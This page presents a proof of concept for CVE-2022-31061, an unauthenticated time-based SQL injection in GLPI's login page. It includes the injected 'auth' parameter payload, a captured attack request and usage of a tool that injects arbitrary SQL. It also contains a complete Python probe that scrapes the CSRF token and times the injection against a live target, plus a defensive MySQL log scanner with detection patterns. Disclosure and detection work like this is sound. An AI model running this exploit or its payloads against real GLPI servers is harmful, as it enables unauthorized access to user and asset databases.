
CVE-2022-31061 PoC — SQL injection on login page in GLPI

Associated Vulnerability
Title: SQL injection on login page in GLPI (CVE-2022-31061)
Description: GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.
Description
PoC for GLPI CVE-2022-31061
Readme
# CVE-2022-31061
PoC for GLPI CVE-2022-31061

A Proof of Concept for GLPI >= 9.3.0 and < 10.0.2 - unauthenticated SQL injection on the login page

## Legal disclaimer : 
Use of this script against a target without mutual consent is illegal.
It is the end user's responsibility to obey all applicable laws in their location.
The developers assume no liability and are not responsible for any misuse or damage caused by this program.

## Context :
Public disclosure : https://github.com/glpi-project/glpi/security/advisories/GHSA-w2gc-v2gm-q7wq on 2022-06-28

Patch : https://github.com/glpi-project/glpi/releases/tag/10.0.2 on 2022-06-28

Commit : https://github.com/glpi-project/glpi/commit/21ae07d00d0b3230f6235386e98388cfc5bb0514

## Vulnerability : 
- page : POST /front/login.php
- parameter : `auth` (the login-source selector). Everything after `ldap-` is placed unescaped into the `auths_id = '...'` condition of the user lookup, so the value `auth=ldap-1%27+UNION+SELECT+SLEEP%285%29+%23+` (decoded: `ldap-1' UNION SELECT SLEEP(5) # `) closes the string literal, appends a `UNION SELECT`, and comments out the trailing quote
- injection : blind, time-based (a vulnerable target answers about `SLEEP(5)` seconds late; no authentication is needed)

## Usage
```
Usage: CVE-2022-31061.py -t https://example.com [-v] [-c cmd]

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        GLPI Website to audit
  -v, --verbose         Display verbose output
  -c CMD, --cmd=CMD     payload to inject. Time based Bind Injection. Context
                        : ' SELECT `id` FROM `glpi_users` WHERE `name` =
                        'fzrfdse' AND `authtype` = '3' AND `auths_id` = '1'
                        [payload] # '
  -u USERAGENT, --user-agent=USERAGENT
                        user-agent to use
  -p PROXY, --proxy=PROXY
                        proxy to use
```

## Example :
Command :
```
$ python CVE-2022-31061.py -t http://target
[ 2022-08-07 14:47:35.911449 ] Begin send request for  UNION SELECT SLEEP(5)
[ 2022-08-07 14:47:54.533460 ] End send request for  UNION SELECT SLEEP(5)  Duration :  18.619755
SUCCESS : target is vulnerable
```

Request :
```
POST /front/login.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: http://target/index.php
Cookie: glpi_3f946f74140a3178722cb675d5bf6b47=921opoti2tp4uk3g35sgor5had
Content-Length: 243
Content-Type: application/x-www-form-urlencoded

noAuto=0&redirect=&_glpi_csrf_token=b029a0270351f75ba69cced0385bd77deb548ec0db25eec2c511ee9064ec6bd6&fielda62f008c7f1837=FWVJDCDC&fieldb62f008c7f1838=U6XGS34JKQPC1LD6&auth=ldap-1%27+UNION+SELECT+SLEEP%285%29+%23+&fieldc62f008c7f1839=on&submit=
```
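To show how the request above is assembled and timed, here is an added example written for this page, not the repository's `CVE-2022-31061.py`. It fetches the login page for a freshly issued CSRF token and the randomised field names, posts a normal `ldap-1` login as a timing baseline, posts the `SLEEP(5)` payload, and compares the two round-trip times. What is assumed rather than taken from the page: that `/index.php` carries a hidden `_glpi_csrf_token` input and three inputs whose names start with `fielda`, `fieldb` and `fieldc` (login, password, remember-me), as the captured POST suggests; the `SAMPLE_FORM` HTML is a constructed fragment in that shape for offline use. Only the standard library is used.

```python
"""Time-based probe for the GLPI login-page injection, rebuilt from the captured
request. Added example for this page, not the repository's script.
Assumptions (labelled, not taken from the page): the login page at /index.php
carries a hidden `_glpi_csrf_token` input and three inputs whose names start with
`fielda`, `fieldb`, `fieldc` (login, password, remember-me); SAMPLE_FORM is a
constructed fragment in that shape, used only for offline testing."""
import http.cookiejar
import re
import time
import urllib.parse
import urllib.request

LOGIN_PAGE = "/index.php"          # GET here: sets the glpi_* session cookie, serves the form
LOGIN_POST = "/front/login.php"    # POST here: the vulnerable handler

# Constructed form fragment (not real GLPI markup); field names copied from the captured request.
SAMPLE_FORM = """
<form action="/front/login.php" method="post">
<input type="text" name="fielda62f008c7f1837">
<input type="password" name="fieldb62f008c7f1838">
<input type="checkbox" name="fieldc62f008c7f1839">
<select name="auth"><option value="ldap-1">LDAP</option></select>
<input type="hidden" name="_glpi_csrf_token" value="b029a0270351f75ba69cced0385bd77deb548ec0db25eec2c511ee9064ec6bd6">
</form>
"""


def parse_login_form(html):
    """Pull the CSRF token and the randomised field names out of the login page."""
    token = re.search(r'name="_glpi_csrf_token"\s+value="([0-9a-f]+)"', html)
    if not token:
        raise ValueError("_glpi_csrf_token not found on login page")
    form = {"token": token.group(1)}
    for key, prefix in (("login", "fielda"), ("password", "fieldb"), ("remember", "fieldc")):
        m = re.search(r'name="(%s[0-9a-f]+)"' % prefix, html)
        if not m:
            raise ValueError("no input named %s* on login page" % prefix)
        form[key] = m.group(1)
    return form


def build_payload(sleep_seconds=5):
    """`auth` value: everything after `ldap-` lands unescaped in `auths_id = '...'`,
    so the quote closes the literal, UNION appends SLEEP(), `#` comments out the rest."""
    return "ldap-1' UNION SELECT SLEEP(%d) # " % sleep_seconds


def build_body(form, auth_value, login="FWVJDCDC", password="U6XGS34JKQPC1LD6"):
    """URL-encoded body in the same field order as the captured POST."""
    fields = [("noAuto", "0"), ("redirect", ""), ("_glpi_csrf_token", form["token"]),
              (form["login"], login), (form["password"], password),
              ("auth", auth_value), (form["remember"], "on"), ("submit", "")]
    return urllib.parse.urlencode(fields)


def is_vulnerable(baseline_seconds, injected_seconds, sleep_seconds=5):
    """The injected login must take at least SLEEP() longer than a normal failed login."""
    return injected_seconds - baseline_seconds >= sleep_seconds


def timed_login(opener, target, auth_value):
    """GET a fresh form (token + field names), POST one login attempt, return its duration."""
    with opener.open(target + LOGIN_PAGE, timeout=30) as resp:
        form = parse_login_form(resp.read().decode("utf-8", "replace"))
    req = urllib.request.Request(target + LOGIN_POST,
                                 data=build_body(form, auth_value).encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Referer", target + LOGIN_PAGE)
    start = time.perf_counter()
    with opener.open(req, timeout=120) as resp:
        resp.read()
    return time.perf_counter() - start


def probe(target, sleep_seconds=5):
    """Live check against e.g. http://target: returns (vulnerable?, baseline, injected)."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    baseline = timed_login(opener, target, "ldap-1")            # plain LDAP source, no payload
    injected = timed_login(opener, target, build_payload(sleep_seconds))
    return is_vulnerable(baseline, injected, sleep_seconds), baseline, injected


if __name__ == "__main__":
    import sys
    vuln, base, inj = probe(sys.argv[1].rstrip("/"))
    print("baseline %.2fs, injected %.2fs -> %s"
          % (base, inj, "VULNERABLE" if vuln else "no delay observed"))
```

Run it as `python probe.py http://target`. The baseline request matters: a slow LDAP bind or an overloaded host can add seconds on its own, so the decision is made on the difference between the two timings rather than on the absolute duration of the injected request, and a new form (and token) is fetched before each POST so that neither attempt is rejected before the query runs.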

MySQL Logs :
```
SELECT `id` FROM `glpi_users` WHERE `name` = 'FWVJDCDC' AND `authtype` = '3' AND `auths_id` = '1' UNION SELECT SLEEP(5) # '
```
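The MySQL log line above is the clearest artefact an exploitation attempt leaves, since the nginx access log carries neither the POST body nor the delay. The following added example (not part of the PoC repository) scans MySQL general-log lines for `glpi_users` lookups whose `auths_id` is not a plain number, or that carry `SLEEP`/`BENCHMARK`/`UNION`. It assumes the general_log file layout (timestamp, thread id, `Query`, statement); the sample lines are constructed, with the injected statement copied from the log shown above and one extra boolean-style variant added to show the check is not tied to the `SLEEP` keyword.

```python
"""Flag injected GLPI user lookups in a MySQL general log.
Added example for this page, not part of the PoC repository.
Assumed log layout (general_log file): <timestamp>\\t<thread id> Query\\t<statement>.
SAMPLE_GENERAL_LOG is constructed; the second statement is the one from the page."""
import re

SAMPLE_GENERAL_LOG = """\
2022-08-07T18:47:10.101Z\t   12 Query\tSELECT `id` FROM `glpi_users` WHERE `name` = 'alice' AND `authtype` = '3' AND `auths_id` = '1'
2022-08-07T18:47:35.911Z\t   13 Query\tSELECT `id` FROM `glpi_users` WHERE `name` = 'FWVJDCDC' AND `authtype` = '3' AND `auths_id` = '1' UNION SELECT SLEEP(5) # '
2022-08-07T18:47:40.200Z\t   13 Query\tSELECT `id` FROM `glpi_users` WHERE `name` = 'bob' AND `authtype` = '1' AND `auths_id` = '0'
2022-08-07T18:47:52.333Z\t   14 Query\tSELECT `id` FROM `glpi_users` WHERE `name` = 'x' AND `authtype` = '3' AND `auths_id` = '1' OR 1=1 # '
"""

# timestamp, thread id, statement
QUERY_LINE = re.compile(r"^(\S+)\t\s*(\d+) Query\t(.*)$")
# A legitimate lookup ends right after a purely numeric auths_id; anything after it is attacker-controlled.
CLEAN_LOOKUP = re.compile(r"FROM `glpi_users` WHERE .*`auths_id` = '(\d+)'\s*$")
# Keywords that have no business inside a login lookup.
SUSPICIOUS = re.compile(r"\b(SLEEP|BENCHMARK|UNION)\b", re.IGNORECASE)


def scan_general_log(text):
    """Return one finding per tampered glpi_users lookup: time, thread, reason, statement."""
    findings = []
    for line in text.splitlines():
        m = QUERY_LINE.match(line)
        if not m:
            continue                                   # connect/quit/other log lines
        ts, thread, stmt = m.groups()
        if "FROM `glpi_users`" not in stmt or "`auths_id`" not in stmt:
            continue                                   # not the login-source lookup
        if CLEAN_LOOKUP.search(stmt) and not SUSPICIOUS.search(stmt):
            continue                                   # well-formed numeric auths_id
        reason = ("time-based/union payload" if SUSPICIOUS.search(stmt)
                  else "auths_id not a bare number")
        findings.append({"time": ts, "thread": thread, "reason": reason, "statement": stmt})
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_GENERAL_LOG):
        print("%s thread=%s %s: %s" % (f["time"], f["thread"], f["reason"], f["statement"]))
```

Point it at a real general log with `scan_general_log(open(path).read())`; the thread id lets you join a finding back to the client connection, and the timestamp lines it up with the `POST /front/login.php` entry in the web server's access log.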

Nginx logs :
```
tester - - [07/Aug/2022:20:47:35 +0200] "GET /index.php HTTP/1.1" 200 3173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
tester - - [07/Aug/2022:20:47:54 +0200] "POST /front/login.php HTTP/1.1" 200 9232 "http://target/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
```
File Snapshot

```
[4.0K] /data/pocs/6f8224c271e0e8eab9576cf32826c93083a30348
├── [6.6K] CVE-2022-31061.py
├── [1.0K] LICENSE
└── [2.9K] README.md

0 directories, 3 files
```